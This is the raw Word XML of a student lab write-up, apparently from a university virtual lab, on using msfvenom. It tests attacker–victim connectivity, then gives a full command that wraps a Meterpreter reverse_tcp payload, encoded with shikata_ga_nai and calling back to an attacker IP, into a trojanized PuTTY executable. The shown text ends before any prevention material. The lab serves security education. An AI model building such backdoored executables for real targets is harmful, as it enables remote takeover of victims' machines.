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33B3C92" w:rsidP="0D1F1E62" w:rsidRDefault="233B3C92" w14:paraId="4319BE63" w14:textId="231DB8CA">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0D1F1E62" w:rsidR="233B3C92">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>____________________________________________________________________________________</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="233B3C92" w:rsidP="0D1F1E62" w:rsidRDefault="233B3C92" w14:paraId="55ECA6BC" w14:textId="0D9DB2C0">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0D1F1E62" w:rsidR="233B3C92">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Objectives:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="233B3C92" w:rsidP="0D1F1E62" w:rsidRDefault="233B3C92" w14:paraId="1847F788" w14:textId="399E078F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="066D311E" w:rsidR="233B3C92">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="066D311E" w:rsidR="51752468">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Learn how to efficiently use </w:t>
      </w:r>
      <w:r w:rsidRPr="066D311E" w:rsidR="51752468">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:r w:rsidRPr="066D311E" w:rsidR="5FEB2391">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="233B3C92" w:rsidP="0D1F1E62" w:rsidRDefault="233B3C92" w14:paraId="306DFB7F" w14:textId="6C05D6E0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="066D311E" w:rsidR="233B3C92">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="066D311E" w:rsidR="13656FC0">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Attack a device</w:t>
      </w:r>
      <w:r w:rsidRPr="066D311E" w:rsidR="66EFB87C">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="233B3C92" w:rsidP="0D1F1E62" w:rsidRDefault="233B3C92" w14:paraId="227B01C6" w14:textId="3F5CA99A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="233B3C92">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="25265E7F">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Learn how to prevent </w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="3BBA64DE">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="25265E7F">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="25265E7F">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="25265E7F">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> attack.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="233B3C92" w:rsidP="0D1F1E62" w:rsidRDefault="233B3C92" w14:paraId="4E37D026" w14:textId="231DB8CA">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="233B3C92">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>____________________________________________________________________________________</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="790B1AD8" w:rsidP="577B6A5F" w:rsidRDefault="790B1AD8" w14:paraId="11B9BBB9" w14:textId="30576781">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="790B1AD8">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The purpose of this document is to help network administrators understand how hackers can use </w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="790B1AD8">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="790B1AD8">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> to gain confidential information about a network. Using this document, administrators should be able to</w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="330700EC">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> clearly understand how to use </w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="330700EC">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="330700EC">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, and how to prevent </w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="330700EC">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="330700EC">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="577B6A5F" w:rsidP="577B6A5F" w:rsidRDefault="577B6A5F" w14:paraId="273D7BFC" w14:textId="1504DAF0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0D1F1E62" w:rsidP="577B6A5F" w:rsidRDefault="0D1F1E62" w14:paraId="5D6AE407" w14:textId="3F51EA20">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="22D28554">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Section 1: Testing Connectivity</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4D0BDF42" w:rsidP="577B6A5F" w:rsidRDefault="4D0BDF42" w14:paraId="6D2BA530" w14:textId="3C5E93EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
        <w:ind/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="22D28554">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Access the Attacker Virtual Machine</w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="5AA99312">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, or your attacker machine</w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="22D28554">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>. Note, this will be using t</w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="22D28554">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">he </w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="5B439883">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Uo</w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="5B439883">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>fSC</w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="5B439883">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Virtual Lab environment. I am limited to using the lab environment as I am on a Chromebook, however this lab can work with any </w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="43729B5F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>device(s) running Linux, just simply changing the IPs for your situation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4D0BDF42" w:rsidP="577B6A5F" w:rsidRDefault="4D0BDF42" w14:paraId="0FD192E3" w14:textId="61BB25FF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
        <w:ind/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="196A4D3F">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Test connectivity between the attacker machine and the victim machine.</w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="5DB4E0DB">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Note that </w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="5DB4E0DB">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ping</w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="5DB4E0DB">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is used to test connectivity, and </w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="5DB4E0DB">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">–c 4 </w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="5DB4E0DB">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tells the machine to send only 4 pings to the machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4D0BDF42" w:rsidP="577B6A5F" w:rsidRDefault="4D0BDF42" w14:paraId="5E94D09E" w14:textId="38A348D4">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidR="7ACCFEE9">
        <w:drawing>
          <wp:inline wp14:editId="54AA1D09" wp14:anchorId="56E240C2">
            <wp:extent cx="4762500" cy="1992374"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1757449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aa1fd5d36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BDF42" w:rsidP="577B6A5F" w:rsidRDefault="4D0BDF42" w14:paraId="0B7363A1" w14:textId="5C6EFFDE">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidR="31B5449E">
        <w:rPr/>
        <w:t>We can see that when the attacker tries to communicate with the victim, certain IP rules are in place to stop the communication.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4D0BDF42" w:rsidP="577B6A5F" w:rsidRDefault="4D0BDF42" w14:paraId="713F1C65" w14:textId="1F7EE344">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="7ACCFEE9">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="3B0CB186">
        <w:rPr/>
        <w:t xml:space="preserve">Test connectivity between the Victim Machine and the Attacker Machine when the Victim is the one to </w:t>
      </w:r>
      <w:r w:rsidR="3B0CB186">
        <w:rPr/>
        <w:t>initiate</w:t>
      </w:r>
      <w:r w:rsidR="3B0CB186">
        <w:rPr/>
        <w:t xml:space="preserve"> the conversation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4D0BDF42" w:rsidP="577B6A5F" w:rsidRDefault="4D0BDF42" w14:paraId="5AFFCAB5" w14:textId="76E04387">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidR="3E2C4251">
        <w:drawing>
          <wp:inline wp14:editId="296F1C34" wp14:anchorId="3BE420E0">
            <wp:extent cx="3449237" cy="1685925"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="487600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d8b3c277e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37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BDF42" w:rsidP="577B6A5F" w:rsidRDefault="4D0BDF42" w14:paraId="20985172" w14:textId="0DE3A007">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidR="3E2C4251">
        <w:rPr/>
        <w:t xml:space="preserve">We can see that when the victim </w:t>
      </w:r>
      <w:r w:rsidR="3E2C4251">
        <w:rPr/>
        <w:t>initiates</w:t>
      </w:r>
      <w:r w:rsidR="3E2C4251">
        <w:rPr/>
        <w:t xml:space="preserve"> the conversation, pings are </w:t>
      </w:r>
      <w:r w:rsidR="3E2C4251">
        <w:rPr/>
        <w:t>received</w:t>
      </w:r>
      <w:r w:rsidR="3E2C4251">
        <w:rPr/>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4D0BDF42" w:rsidP="577B6A5F" w:rsidRDefault="4D0BDF42" w14:paraId="4FE97C7D" w14:textId="38C39770">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="3E2C4251">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">Section 2: Using </w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="3E2C4251">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="3E2C4251">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> to create a malicious executable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4D0BDF42" w:rsidP="577B6A5F" w:rsidRDefault="4D0BDF42" w14:paraId="61C9AD96" w14:textId="570B2874">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
        <w:ind/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="36F3517C">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using the command </w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="36F3517C">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>ifconfig</w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="36F3517C">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="36F3517C">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>find the attackers eth0 ip address.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4D0BDF42" w:rsidP="577B6A5F" w:rsidRDefault="4D0BDF42" w14:paraId="2CFD3CC4" w14:textId="5B034203">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidR="36F3517C">
        <w:drawing>
          <wp:inline wp14:editId="6839C043" wp14:anchorId="633AA385">
            <wp:extent cx="3343275" cy="2427089"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2098658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2f5b8b516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BDF42" w:rsidP="577B6A5F" w:rsidRDefault="4D0BDF42" w14:paraId="074FFBA0" w14:textId="7CBA0FFA">
      <w:pPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidR="36F3517C">
        <w:rPr/>
        <w:t>We can see that the address is 216.0.0.10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4D0BDF42" w:rsidP="577B6A5F" w:rsidRDefault="4D0BDF42" w14:paraId="27919DE4" w14:textId="63D6CCFF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
        <w:ind/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="36F3517C">
        <w:rPr/>
        <w:t xml:space="preserve">Gain root access to run </w:t>
      </w:r>
      <w:r w:rsidR="36F3517C">
        <w:rPr/>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:r w:rsidR="36F3517C">
        <w:rPr/>
        <w:t xml:space="preserve">. Use </w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="36F3517C">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="36F3517C">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="36F3517C">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>su</w:t>
      </w:r>
      <w:r w:rsidR="36F3517C">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and enter the root password.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4D0BDF42" w:rsidP="577B6A5F" w:rsidRDefault="4D0BDF42" w14:paraId="5E3CFC36" w14:textId="48453D3A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="160" w:afterAutospacing="off" w:line="279" w:lineRule="auto"/>
        <w:ind/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="36F3517C">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>We will now create the malicious executable.</w:t>
      </w:r>
      <w:r w:rsidR="6E56F1F7">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> We will use Putty.exe. Putty is a common application to have on an individual’s device. Note that this could work with any executable. Enter the comma</w:t>
      </w:r>
      <w:r w:rsidR="2B5EA295">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nd </w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="2B5EA295">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="2B5EA295">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> –a x86 –platform windows –x putty.exe -k –p windows/</w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="2B5EA295">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="2B5EA295">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="2B5EA295">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="2B5EA295">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> LHOST=</w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="73FC239C">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>216.0.0.10 LPORT=4444 –e x86/</w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="73FC239C">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>shikata_ga_nai</w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="73FC239C">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="73FC239C">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="73FC239C">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3 –b “\x00” -f exe –o malic</w:t>
      </w:r>
      <w:r w:rsidRPr="577B6A5F" w:rsidR="006424FA">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>iousPutty.exe</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="3A6A16AA">
        <w:drawing>
          <wp:inline wp14:editId="7E307674" wp14:anchorId="32B7AE9C">
            <wp:extent cx="6048375" cy="1719332"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="61308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7281011b8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6A16AA">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t>It is</w:t>
      </w:r>
      <w:r w:rsidR="443CC040">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> saved as maliciousPutty.exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4D0BDF42" w:rsidP="577B6A5F" w:rsidRDefault="4D0BDF42" w14:paraId="40FB261F" w14:textId="361BBE6E">
      <w:pPr>
